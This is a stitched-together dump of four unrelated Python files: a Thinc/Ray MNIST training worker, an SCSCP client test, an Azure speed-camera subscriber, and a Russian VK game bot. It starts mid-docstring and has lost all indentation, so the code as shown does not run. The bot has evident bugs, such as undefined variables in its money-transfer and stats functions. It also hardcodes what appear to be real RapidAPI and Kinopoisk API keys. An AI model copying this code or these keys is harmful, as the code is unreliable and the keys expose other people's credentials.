TensorFlow version: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/mnist/mnist.py
"""
# pip install thinc ml_datasets typer
import threading
from typing import Optional
import time
from thinc.types import FloatsXd, Floats2d
import ml_datasets
from wasabi import msg
from tqdm import tqdm
from thinc.api import registry, Model, get_current_ops
from spacy_ray.thinc_proxies import RayPeerProxy
from spacy_ray.util import set_params_proxy, divide_params
import ray
def thread_training(train_data, model):
for X, Y in train_data:
Yh, backprop = model.begin_update(X)
backprop(Yh - Y)
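# thread_training runs one full pass over the worker's shard, backpropagating the
# (Yh - Y) error; ThincWorker.train_epoch launches it on a background thread and
# is_running() reports whether that pass has finished.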
class ThincWorker:
"""Worker for training Thinc models with Ray.
Mostly used for development, e.g. for the mnist scripts.
"""
def __init__(self, config, i, n_workers):
config = registry.make_from_config(config)
self.i = i
self.n_workers = n_workers
self.optimizer = config["optimizer"]
self.train_data = config["train_data"]
self.dev_data = config["dev_data"]
self.thread = None
self.proxy = None
self.n_grads_used = 0
self.n_grads_discarded = 0
def get_percent_grads_used(self):
total = self.n_grads_used + self.n_grads_discarded
if total == 0:
return None
else:
return self.n_grads_used / total
def add_model(self, model):
self.model = model
for X, Y in self.train_data:
self.model.initialize(X=X, Y=Y)
break
def sync_params(self):
for key in self.proxy._owned_keys:
self.proxy.send_param(key)
def inc_grad(self, key, version, value) -> None:
assert key in self.proxy._owned_keys
if self.proxy.check_version(key, version):
self.proxy.inc_grad(key[0], key[1], value)
self.n_grads_used += 1
else:
self.n_grads_discarded += 1
def set_param(self, key, version, value) -> Optional[FloatsXd]:
return self.proxy.receive_param(key, version, value)
def set_proxy(self, workers, quorum):
worker_keys = divide_params(self.model, self.n_workers)
peer_map = {}
for peer, keys in zip(workers, worker_keys):
for key in keys:
peer_map[key] = peer
self.proxy = RayPeerProxy(
peer_map,
self.optimizer,
worker_keys[self.i],
)
set_params_proxy(self.model, self.proxy)
def train_epoch(self):
self.thread = threading.Thread(
target=thread_training, args=(self.train_data, self.model)
)
self.thread.start()
def is_running(self):
return self.thread.is_alive()
def evaluate(self):
correct = 0
total = 0
for X, Y in self.dev_data:
Yh = self.model.predict(X)
correct += (Yh.argmax(axis=1) == Y.argmax(axis=1)).sum()
total += Yh.shape[0]
return correct / total
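# Registered dataset factories: the training batches are sharded so each worker
# gets its own contiguous slice of MNIST, while every worker evaluates on the
# full dev set.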
@registry.datasets("mnist_train_batches.v1")
def get_train_data(worker_id, num_workers, batch_size):
ops = get_current_ops()
# Load the data
(train_X, train_Y), _ = ml_datasets.mnist()
shard_size = len(train_X) // num_workers
shard_start = worker_id * shard_size
shard_end = shard_start + shard_size
return list(
ops.multibatch(
batch_size,
train_X[shard_start:shard_end],
train_Y[shard_start:shard_end],
shuffle=True,
)
)
@registry.datasets("mnist_dev_batches.v1")
def get_dev_data(batch_size):
ops = get_current_ops()
_, (dev_X, dev_Y) = ml_datasets.mnist()
dev_data = ops.multibatch(batch_size, dev_X, dev_Y)
return list(dev_data)
|
test_client.py
|
import unittest
import socket
from threading import Thread
import openmath.openmath as om
from openmath.encoder import encode_bytes
from openmath.decoder import decode_bytes
from scscp.client import SCSCPClient
from scscp.server import SCSCPServerBase
from scscp import scscp
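# Connects an SCSCPClient to an in-process SCSCPServerBase over socket.socketpair()
# and checks that a procedure call round trip produces the expected OpenMath objects.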
class TestClient(unittest.TestCase):
def setUp(self):
server, client = socket.socketpair()
self.client = SCSCPClient(client)
self.server = SCSCPServerBase(server, name=b'Test', version=b'none')
t = Thread(target=self.server.accept)
t.start()
self.client.connect()
t.join()
def tearDown(self):
self.client.quit()
def test_call_wait(self):
""" Test a procedure call and wait """
call = self.client.call(scscp.get_allowed_heads())
self.assertEqual(call.type, "procedure_call")
self.assertEqual(call.params, [(om.OMSymbol('option_return_object', 'scscp1'), om.OMString(True))])
self.assertEqual(call.data, om.OMApplication(om.OMSymbol('get_allowed_heads', 'scscp2'), []))
msg = decode_bytes(self.server.receive())
self.assertEqual(msg, om.OMObject(om.OMAttribution(
om.OMAttributionPairs([
(om.OMSymbol('call_id', 'scscp1'), om.OMString(call.id)),
(om.OMSymbol('option_return_object', 'scscp1'), om.OMString('True'))
]),
om.OMApplication(om.OMSymbol('procedure_call', 'scscp1'), [
om.OMApplication(om.OMSymbol('get_allowed_heads', 'scscp2'), [])])
), version='2.0'))
comp = scscp.SCSCPProcedureMessage.completed(call.id, scscp.symbol_set())
self.server.send(encode_bytes(comp.om()))
resp = self.client.wait()
self.assertEqual(resp.type, "procedure_completed")
self.assertEqual(resp.id, call.id)
self.assertEqual(resp.params, [])
self.assertEqual(resp.data, om.OMApplication(
om.OMSymbol('symbol_set', 'scscp2'),
[om.OMApplication(om.OMSymbol('CDName', 'meta'), [om.OMString('scscp1')]),
om.OMApplication(om.OMSymbol('CDName', 'meta'), [om.OMString('scscp2')])
]
))
|
subscriber.py
|
from abc import ABCMeta, abstractmethod
from azure.servicebus import Rule
from speedcamera import SpeedCamera
import azurehook
import threading
import json
import math
import time
import Queue
import random
################################################################################
################################################################################
#
# A Generic Class responsible for handling data received
# through an Azure subscription
#
################################################################################
################################################################################
class AzureSubscriber(object):
__metaclass__ = ABCMeta
def __init__(self, topicName, subscriptionName, ruleName = None, rule = None):
self.azure = azurehook.AzureHook()
self.topic = topicName
self.subscription = subscriptionName
self.ruleName = ruleName
self.rule = rule
self.isActive = False
def activate(self, timeout = 2):
self.azure.subscribe(self.topic, self.subscription)
# Create rule if given
if self.ruleName is not None and self.rule is not None:
self.azure.serviceBus.create_rule(self.topic, self.subscription, self.ruleName, self.rule)
self.azure.serviceBus.delete_rule(self.topic, self.subscription, '$Default')
self.isActive = True
self.nextCheck = threading.Event()
retries = 0
while self.isActive:
message = self.azure.getMessage(
self.topic,
self.subscription,
timeout=timeout)
# print(message.body)
# If no message was retrieved - try again later with exponential backoff
if message is None or message.body is None:
retries += 1
else:
body = json.loads(message.body)
self.onNewMessage(body)
retries = 0
# Calculate exponential backoff and sleep (may be woken up by terminate)
self.nextCheck.wait(self.__nextTimeout(retries))
def terminate(self):
self.isActive = False
self.nextCheck.set()
self.onTerminate()
def onTerminate(self):
pass
    # Exponential backoff, capped at maxNtries.
    # Given by the formula: timeout(seconds) = (2^ntries / 10)
def __nextTimeout(self, ntries, maxNtries = 12):
# Define maximum timeout
if(ntries > maxNtries):
ntries = maxNtries
        # if ntries == 0  -> timeout = 0.1 s (100 ms)
        # if ntries == 12 -> timeout = 409.6 s (~6.8 min)
return math.pow(2, ntries) / 10.
@abstractmethod
def onNewMessage(self, dic):
pass
################################################################################
################################################################################
#
# Class responsible for vehicle checks
#
################################################################################
################################################################################
class VehicleInspector(AzureSubscriber):
def __init__(self, queueSize = 0):
rule = Rule()
rule.filter_type = 'SqlFilter'
rule.filter_expression = "event = '%s'" % (SpeedCamera.EVENT_VEHICLE)
# Call super class constructor
AzureSubscriber.__init__(self, SpeedCamera.TOPIC, "VehicleInspector",
"VehicleInspectorRule", rule)
        # Create the work queue up front so onNewMessage can enqueue plates
        # even before the processing thread has started running
        self.queue = Queue.Queue(maxsize = queueSize)
        # The thread runs vehicleProcessing, which pulls plates off the queue
        # (blocking until one is available) and checks them with isVehicleStolen
        processingThread = threading.Thread(target=self.vehicleProcessing)
        # Daemon thread: exits automatically when the parent thread exits
        processingThread.daemon = True
processingThread.start()
def onNewMessage(self, dic):
plate = dic['vehicle']['plate']
self.queue.put(plate, block = True, timeout = 10)
# print("Size of queue (after put) = %d" % self.queue.qsize())
# This will be killed when parent thread is killed
def vehicleProcessing(self):
        print("")
print("Vehicle processing started (queue size = %d)" % self.queue.qsize())
while True:
plate = self.queue.get(block = True, timeout = None)
isStolen = self.isVehicleStolen(plate)
if isStolen:
print "Vehicle with plate '%s' is stolen!!!" % plate
else:
print "Vehicle with plate '%s' is NOT stolen." % plate
# Should be called from a separate thread
def isVehicleStolen(self, plate, sleepFor = 5):
print ""
print "Processing vehicle with plate: '%s'" % plate
time.sleep(sleepFor)
return random.random() > 0.95
def onTerminate(self):
print "Killed"
print ""
print("Size of queue = %d" % self.queue.qsize())
|
bot.py
|
# -*- coding: utf-8 -*-
import vk_api
import requests
import bs4
import datetime
import random
import json
import time
import os.path
import threading
from vk_api.keyboard import VkKeyboard, VkKeyboardColor
from bot_4u.checkers import *
from bot_4u.config import *
from bot_4u.keyboards import *
from bot_4u.games import *
from bot_4u.hackgame import *
from bot_4u.texts import *
from bot_4u.work import *
from bot_4u.shop import *
from bot_4u.btcshop import *
from bot_4u.btcexchge import *
def res():
return time.strftime("%x %X", time.localtime())
users = next(os.walk("json/"))[2]
vk = vk_api.VkApi(token=token)
vk._auth_token()
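# Per-user state lives in json/<peer_id>.json; nearly every helper below reads that
# file, mutates a field, and rewrites it with json.dumps(indent=4).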
def log(id, body, *args):
id = str(id)
if body != "block":
with open('log.txt', 'a', encoding='utf-8') as f:
f.writelines("\n[" + res() + "] " + id + " " + str(body) + " | Успешно!")
print("\n[" + res() + "] " + id + " " + str(body) + " | Успешно!")
else:
with open('log.txt', 'a', encoding='utf-8') as f:
f.writelines("\n[" + res() + "] " + id + " " + str(body) + " | Ошибка!")
print("\n[" + res() + "] " + id + " " + str(body) + " | Ошибка!")
def prof(id):
x = {
"id": id,
"balance": 1000,
"bank": 0,
"btc": 0.0,
"farm": 0.0,
"gpu": "",
"gpu_amount": 0,
"farmed": 0.0,
"farming": False,
"level": 1,
"exp": 0,
"nick": "",
"kwin": 0,
"klose": 0,
"mwin": 0,
"mlose": 0,
"work": "",
"wstatus": False,
"reg": res(),
"lbonus": 1623869110,
"car": "",
"phone": "",
"home": "",
"banned": "NO",
"hlevel": 1,
"hexp": 0,
"hhp": 20,
"hplvl": 1,
"hdamage": 1,
"damagelvl": 1,
"hdef": 1,
"deflvl": 1,
"pdamage": 0,
"php": 0,
"pdef": 0,
"hvpn": "",
"hcomp": "",
"hsheltr": ""
}
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
except:
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(x, indent=4))
vk.method("messages.send", {"peer_id": 419760643,
"message": "💎 Новый пользователь! | vk.com/id" + str(id),
"random_id": random.randint(1, 2147483647)})
return '💬 Добро пожаловать! Я вижу ты здесь новенький, используй "хелп" для помощи и развлекайся!' \
'\n💲 А еще,держи свой бонус в размере 1000$\n\n' + prof(str(id))
return 'Ваш профиль\n\n' + \
'🔎 id: ' + str(ff["id"]) + \
'\n📋 Ник: ' + str(ff["nick"]) + \
'\n💰 Баланс: ' + str(ff["balance"]) + "$" + \
'\n💳 Банк: ' + str(ff["bank"]) + "$" + \
'\n💴 Биткоины: ' + str(round(ff["btc"],5)) + "₿" + \
'\n💼 Работа: ' + str(ff["work"]) + \
'\n' \
'\n🔑 Имущество:' \
'\n 🚗 Машина: ' + carcheck(id) + \
'\n 🏡 Дом: ' + homecheck(id) + \
'\n 📱 Телефон: ' + phonecheck(id) + \
'\n 🎞 Видеокарта: ' + farmcheck(id) + \
'\n' + prof2(id)
def prof2(id):
    with open('json/' + str(id) + '.json') as f:
        ff = json.loads(f.read())
    if id in admins or id in moders:
        return '\n👔 Вы персонал: ' + ifstaff(id) + \
               '\n📅 Дата регистрации: ' + str(ff["reg"]) + ver
    else:
        return '\n📅 Дата регистрации: ' + str(ff["reg"]) + ver
def dprof(idd):
idd = ids(idd)
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
return 'Ссылка на профиль: vk.com/id' + idd + \
'\n🔎 id: ' + str(ff["id"]) + \
'\n📋 Ник: ' + str(ff["nick"]) + \
'\n💰 Баланс: ' + str(ff["balance"]) + \
'\n💳 Банк: ' + str(ff["bank"]) + \
'\n💴 Биткоины: ' + str(ff["btc"]) + \
'\n📶 Уровень: ' + str(ff["level"]) + \
'\n💡 Опыт: ' + str(ff["exp"]) + \
'\n👔 Персонал: ' + ifstaff(int(idd)) + \
'\n' \
'\n🔑 Имущество:' \
'\n 🚗 Машина: ' + carcheck(idd) + \
'\n 🏡 Дом: ' + homecheck(idd) + \
'\n 📱 Телефон: ' + phonecheck(idd) + \
'\n 🎞 Видеокарта: ' + farmcheck(idd) + \
'\n' \
'\n⛔ Блокировка: ' + profbancheck(idd) + \
'\n📅 Дата регистрации: ' + str(ff["reg"])
def giveban(id,idd,rsn):
idd = ids(idd)
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = str(f[i][:-5])
if idd in f:
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
if ff["banned"] == "NO":
s = str(id) + " " + rsn
ff["banned"] = s
with open('json/' + str(idd) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": idd,
"message": "⚠ Вы были заблокированы по причине: " + rsn + "\nЕсли не согласны с баном,напишите в репорт",
"random_id": random.randint(1, 2147483647)})
return "Пользователь успешно заблокирован!"
else:
return "Пользователь уже забанен!"
else:
return "Такого пользователя не существует!"
def unban(idd):
idd = ids(idd)
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = str(f[i][:-5])
if idd in f:
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
if ff["banned"] != "NO":
ff["banned"] = "NO"
with open('json/' + str(idd) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": idd,
"message": "Поздравляю!🎉 Вы были разблокированы!",
"random_id": random.randint(1, 2147483647)})
return "Пользователь успешно разблокирован!"
else:
return "Пользователь не имеет блокировки"
else:
return "Такого пользователя не существует!"
def nick(id, nick):
if len(nick) <= 15:
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
ff = json.loads(f.read())
ff["nick"] = nick
with open('json/' + str(id) + '.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь ваш ник: " + nick
else:
return "Ваш ник больше 15 символов!"
def dnick(id, nick):
if len(nick) <= 15:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["nick"] = nick
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Ник " + id + " теперь: " + str(ff["nick"])
else:
return "Ник больше 15 символов!"
def clvl (id, val):
if int(val) >= 1 and int(val) <= 5:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
try:
ff["level"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь у вас " + str(ff["level"]) + " уровень"
else:
return "Вы ввели значение меньше 1 или больше 5"
def cexp (id, val):
if int(val) >= 0 and int(val) <= 500:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
try:
ff["exp"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь у вас " + str(ff["exp"]) + " опыта"
else:
return "Вы ввели значение меньше 1 или больше 5"
def bank(id, type, amount):
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
ff = json.loads(f.read())
if type == "положить" and amount == "все" or amount == "всё":
amount = ff["balance"]
if type == "снять" and amount == "все" or amount == "всё":
amount = ff["bank"]
if type == "положить" and amount == "половину":
amount = int(ff["balance"] / 2)
if type == "снять" and amount == "половину":
amount = int(ff["bank"] / 2)
if int(amount) > 0 and int(amount) <= ff["balance"] and type == "положить":
ff["balance"] -= int(amount)
ff["bank"] += int(amount)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы успешно положили " + str(amount) + "$ в банк!"
elif int(amount) > 0 and int(amount) <= ff["bank"] and type == "снять":
ff["balance"] += int(amount)
ff["bank"] -= int(amount)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы успешно сняли " + str(amount) + "$ со счёта!"
else:
return "Сумма превышает баланс или меньше 0\n" + bal(id)
def bal(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
return '💰Ваш баланс: ' + str(ff["balance"]) + "$\n💴 Биткоины: " + str(round(ff["btc"],5)) + " ₿"
def cbal(id,val):
if int(val) >= 0 and int(val) <= 1000000:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
try:
ff["balance"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь ваш баланс: " + str(ff["balance"])
else:
return "Вы ввели значение меньше нуля или больше 1 000 000"
def dbal (idd,val):
idd = ids(idd)
if int(val) >= 0 and int(val) <= 1000000000:
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
try:
ff["balance"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(idd) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь баланс " + idd + ": " + str(ff["balance"])
else:
return "Вы ввели значение меньше нуля или больше 1 000 000 000"
def cbtc (id, val):
if float(val) >= 0 and float(val) <= 5000:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["btc"] = round(float(val),5)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь у вас " + str(ff["btc"]) + "₿"
else:
return "Вы ввели значение меньше нуля или больше 5000"
def pay(id, idd, val):
idd = ids(idd)
if str(id) == str(idd):
return "🙃 Нельзя переводить самому себе!"
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
per = json.loads(f.read())
try:
with open('json/' + str(idd) + '.json', encoding='utf-8') as f:
pol = json.loads(f.read())
except:
return "Такого пользователя не существует!"
if int(val) > 0 and int(val) <= per["balance"]:
per["balance"] -= int(val)
pol["balance"] += int(val)
with open('json/' + str(id) + '.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(per, indent=4))
with open('json/' + str(idd) + '.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(pol, indent=4))
if per["nick"] != '':
vk.method("messages.send", {"peer_id": idd,
"message": "💎 | Вы получили перевод от " + "@id" + str(id) + " (" + ff["nick"] + ")" + " в размере: " + val + "$",
"random_id": random.randint(1, 2147483647)})
else:
user = vk.method("users.get", {"user_ids": id})
vk.method("messages.send", {"peer_id": idd,
"message": "💎 | Вы получили перевод от " + "@id" + str(id) + " (" + user[0]['first_name'] + ") в размере: " + val + "$",
"random_id": random.randint(1, 2147483647)})
return "Перевод успешно выполнен! \nВаш баланс: " + str(per["balance"]) + "$"
else:
return "Сумма превышает ваш баланс или Сумма меньше 0\n" + bal(id)
def ulist():
c=1
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = '[' + str(c) + '] ' + "vk.com/id" + str(f[i][:-5])
c += 1
return "Количество пользователей [" + str(c) + "]"
def getanekdot():
z = ''
s = requests.get('http://anekdotme.ru/random')
b = bs4.BeautifulSoup(s.text, "html.parser")
p = b.select('.anekdot_text')
for x in p:
s = (x.getText().strip())
z = z + s + '\n\n'
return s
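# The Call of Duty stats helpers below (stats2/stats/stats20) parse the RapidAPI
# response by splitting its raw text on commas and slicing fixed offsets instead of
# using json.loads, so they are tightly coupled to the exact response layout.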
def stats2(nick, idd):
url = "https://call-of-duty-modern-warfare.p.rapidapi.com/multiplayer/" + nick + "%23" + idd + "/battle"
headers = {
'x-rapidapi-key': "3d7ffcf6eemsheb0b038baa4b97ep118126jsnd220b4b88e25",
'x-rapidapi-host': "call-of-duty-modern-warfare.p.rapidapi.com",
}
time.sleep(1)
response = requests.request("GET", url, headers=headers)
r = str(response.text).split(",")
p=["level", "levelXpRemainder", "levelXpGained", "prestige"]
a=[]
b=[]
c=0
for i in range (len(r)):
for j in range(len(p)):
if p[j] in r[i+c] and p[j] not in a:
a.append(i)
break
a = a[0:(len(p))]
a = list(map(int, a))
for i in range (len(a)):
b.append(r[a[i]])
if len(r) > 3:
#level
lvl = "\n🏷Уровень: " + b[0][8:]
#prestige
pr = "\n🔰Престиж: " + b[3][11:]
#lvlxp
lvlxp = "\n📋Прогресс уровня: " + b[1][19:] + "/" + b[2][16:] + "\n"
stat2 = lvl + pr + lvlxp
return stat2
else:
return 0
def stats(nick, idd):
url = "https://call-of-duty-modern-warfare.p.rapidapi.com/warzone/" + nick + "%23" + idd + "/battle"
headers = {
'x-rapidapi-key': "3d7ffcf6eemsheb0b038baa4b97ep118126jsnd220b4b88e25",
'x-rapidapi-host': "call-of-duty-modern-warfare.p.rapidapi.com",
}
response = requests.request("GET", url, headers=headers)
r = str(response.text).split(",")
if len(r) > 3:
# WINS
wins = "\n🎉Побед: " + r[0][14:999]
# KILLS
kills = "\n🥴Убийств: " + r[1][8:999]
# KD
kd = "\n📈К/Д: " + r[2][10:14]
# DEATHS
deaths = "\n☠Смертей: " + r[15][9:999]
# top25
top25 = "\n2️⃣5️⃣Топ-25: " + r[4][16:999]
# top10
top10 = "\n1️⃣0️⃣Топ-10: " + r[5][9:999]
# contracts
contracts = "\n🎟Контракты: " + r[6][12:999]
# revives
revives = "\n➕Поднятий: " + r[7][10:999]
# DOWNS
downs = "\n🔻Нокдауны: " + r[3][8:999]
# top5
top5 = "\n5️⃣Топ-5: " + r[8][10:999]
# matches
matches = "\n\n⌨Всего игр: " + r[11][14:999]
# score
score = "\n💡Всего EXP: " + r[9][8:999]
# scorePM
spm = r[13][17:999]
sppm = round(float(spm))
scorePM = "\n🎛EXP в минуту: " + str(sppm)
# timeplayed
ttt = (datetime.timedelta(seconds=int(r[10][13:999])))
totaltime = "\n💻Всего отыграно времени: " + str(ttt)
# avgkills
avgk = int(r[1][8:999]) / int(r[11][14:999])
avgkills = "\n😵Ср.Убийств: " + str(round(avgk, 2))
stat = "📊Статистика " + nick + "#" + idd + matches + "\n" + kills + avgkills + "\n" + downs + revives + "\n" + deaths + "\n" + kd + "\n" + wins + "\n" + score + scorePM + contracts + "\n" + stats2(nick, idd) + top5 + top10 + top25 + "\n" + totaltime + "\n\nby @gamtz" + ver
vk.method("messages.send", {"peer_id": id, "message": stat, "random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Ошибка! Проверьте ник и id⚠\nТакже проверьте настройки "
"приватности.\nПодробности в статье: vk.com/@cod_stats-help",
"random_id": random.randint(1, 2147483647)})
def stats20(nick, idd):
a = []
p = ["kills", "headshots", "killsPerGame", "headshotPercentage", "objectiveTeamWiped", "assists", "deaths",
"kdRatio", "score", "scorePerMinute", "gulagKills", "gulagDeaths", "damageDone", "damageTaken",
"distanceTraveled", "avgLifeTime", "timePlayed"]
url = "https://call-of-duty-modern-warfare.p.rapidapi.com/warzone-matches/" + nick + "%23" + idd + "/battle"
headers = {
'x-rapidapi-key': "3d7ffcf6eemsheb0b038baa4b97ep118126jsnd220b4b88e25",
'x-rapidapi-host': "call-of-duty-modern-warfare.p.rapidapi.com"
}
response = requests.request("GET", url, headers=headers)
r = str(response.text).split(",")
c = 0
for i in range(len(r)):
for j in range(len(p)):
if p[j] in r[i + c] and p[j] not in a:
a.append(i)
break
a = a[0:(len(p))]
a = list(map(int, a))
if len(r) > 3:
# kills
kills = "\n\n🥴Убийств: " + r[a[0]][27:999]
# fsquad
fsquad = "\n👥Сквадов уничтожено: " + r[a[1]][21:999]
# avglife
if round(float(r[a[2]][14:999])) > 0:
avgl = round(float(r[a[2]][14:999]))
avglife = "\n⌛Среднее время жизни: " + str((datetime.timedelta(seconds=int(avgl))))
else:
avglife = "\n⌛Среднее время жизни: " + "⚠Cыграйте больше игр⚠"
# score
score = "\n💡Всего exp: " + r[a[3]][8:999]
# hs
hs = "\n💀Убийства в голову: " + r[a[4]][12:999]
# assists
assists = "\n♻Помощи: " + r[a[5]][10:999]
# avgkills
avgkills = "\n😵Ср.убийств: " + r[a[6]][15:999]
# scorepm
if round(float(r[a[7]][17:999])) > 0:
scorepm = "\n🎛Exp в минуту: " + str(round(float(r[a[7]][17:999])))
else:
scorepm = "\n🎛Exp в минуту: " + "⚠Cыграйте больше игр⚠"
# distance
distance = "\n🗺Пройденная дистанция: " + str(round(float(r[a[8]][19:999]) / 100000))
# deaths
deaths = "\n☠Смертей: " + r[a[9]][9:999]
# kd
kd = "\n📈К/Д: " + str(round(float(r[a[10]][10:999]), 2))
# gulagdeaths
gdeaths = "\n🕳Смертей в гулаге: " + r[a[11]][14:999]
# totaltime
if round(float(r[a[12]][13:999])) > 0:
tt = round(float(r[a[12]][13:999]))
totaltime = "\n💻Всего отыграно времени: " + str((datetime.timedelta(seconds=int(tt))))
else:
totaltime = "\n💻Всего отыграно времени: " + "⚠Cыграйте больше игр⚠"
# hsper
hsper = "\n🧠Процент убийств в голову: " + str(round(float(r[a[13]][21:999]), 2))
# gulagkills
gkills = "\n👮Убийств в гулаге: " + r[a[14]][13:999]
# damagegive
gdamage = "\n🔫Нанесено урона: " + r[a[15]][13:999]
# damagetaken
td = r[a[16]].split("}")
tdamage = "\n🥊Получено урона: " + td[0][14:999]
# gulagkd
gkd = "\n📊Гулаг К/Д: " + str(round(float(int(gkills[20:999]) / int(gdeaths[20:999])), 2))
stat20 = "📊статистика " + nick + "#" + idd + " за последние 20 матчей" + kills + hs + avgkills + hsper + fsquad + "\n" + assists + "\n" + deaths + "\n" + kd + "\n" + score + scorepm + "\n" + gkills + gdeaths + gkd + "\n" + gdamage + tdamage + "\n" + distance + avglife + totaltime + "\n\nby @gamtz" + ver
vk.method("messages.send", {"peer_id": id, "message": stat20, "random_id": random.randint(1, 2147483647)})
else:
vk.method("messages.send", {"peer_id": id,
"message": "⚠Ошибка! Проверьте ник и id⚠\nТакже проверьте настройки приватности.\nПодробности в статье: vk.com/@cod_stats-help",
"random_id": random.randint(1, 2147483647)})
def uplf(iddd, purl):
global d
p = requests.get(purl[1])
out = open("films/" + iddd + ".jpg", "wb")
out.write(p.content)
out.close()
a = vk.method("photos.getMessagesUploadServer")
b = requests.post(a['upload_url'], files={'photo': open('films/' + iddd + '.jpg', 'rb')}).json()
c = vk.method('photos.saveMessagesPhoto', {'photo': b['photo'], 'server': b['server'], 'hash': b['hash']})[0]
d = "photo{}_{}".format(c["owner_id"], c["id"])
def rfilm():
global iddd
iddd = str(random.randrange(1, 99999))
url = 'https://kinopoiskapiunofficial.tech/api/v2.1/films/' + iddd
headers = {
'X-API-KEY': '79e32931-ef2c-4921-9e01-dac1d164971b',
}
response = requests.get(url, headers=headers)
r = str(response.text).split(",")
p=["nameRu", "webUrl", "posterUrl", "posterUrlPreview", "year"]
a=[]
b=[]
c=0
for i in range(len(r)):
for j in range(len(p)):
if p[j] in r[i+c] and p[j] not in a:
a.append(i)
break
a = a[0:(len(p))]
a = list(map(int, a))
for i in range(len(a)):
b.append(r[a[i]])
#
name = 'Название: ' + b[0][9:]
#
kkurl = (b[1][9:]).split('"')
kurl = 'Ссылка на Кинопоиск: ' + kkurl[1]
#
purl = (b[2][12:]).split('"')
#
year = 'Год выпуска: ' + (b[4][7:])
res = name + "\n" + year + '\n' + kurl
uplf (iddd, purl)
return (res)
def lvlcheck(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
if ff["exp"] > 50 and ff["level"] == 1:
ff["level"] = 2
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
if ff["exp"] > 150 and ff["level"] == 2:
ff["level"] = 3
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
if ff["exp"] > 300 and ff["level"] == 3:
ff["level"] = 4
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
if ff["exp"] >= 500 and ff["level"] == 4:
ff["level"] = 5
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": id,
"message": "💎 Поздравляю! Вы повысили свой уровень до " + str(ff["level"]),
"random_id": random.randint(1, 2147483647)})
return
def workinfo(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
return "\n👤 Информация:" \
"\n" \
"\n💼 Работа: " + str(ff["work"]) + \
"\n📶 Уровень: " + str(ff["level"]) + \
"\n💡 Опыт: " + str(ff["exp"])
def works(id):
s= "Список работ:" \
"\n\n" \
+ str(lvlchk2(id,1)) + " 1 уровень" \
"\n 1) 🚕 FakeTAXI - 100$ | 20 секунд | 2 опыта" \
"\n 2) 👨🌾 Ферма - 180$ | 40 секунд | 4 опыта" \
"\n\n" \
+ str(lvlchk2(id,2)) + " 2 уровень" \
"\n 3) 💻 Тестировщик игр - 420$ | 1 минута | 6 опыта" \
"\n 4) ☕ Работник кофейни - 600$ | 1:30 минуты | 9 опыта" \
"\n\n" \
+ str(lvlchk2(id,3)) + " 3 уровень" \
"\n 5) 🏭 Рабочий на заводе - 1 080$ | 2 минуты | 12 опыта" \
"\n 6) 🍷 Дегустатор вина - 1 600$ | 3 минуты | 18 опыта" \
"\n\n" \
+ str(lvlchk2(id,4)) + " 4 уровень" \
"\n 7) 💨 Продавец в Verdax - 3 600$ | 5 минут | 30 опыта" \
"\n 8) 🌸 Дизайнер - 7 000$ | 10 минут | 60 опыта" \
"\n\n" \
+ str(lvlchk2(id,5)) + " 5 уровень" \
"\n 9) 🍥 Режиссёр Аниме - 18 000$ | 20 минут" \
"\n 10) 👽 Директор Natflex - 36 000$ | 40 минут" \
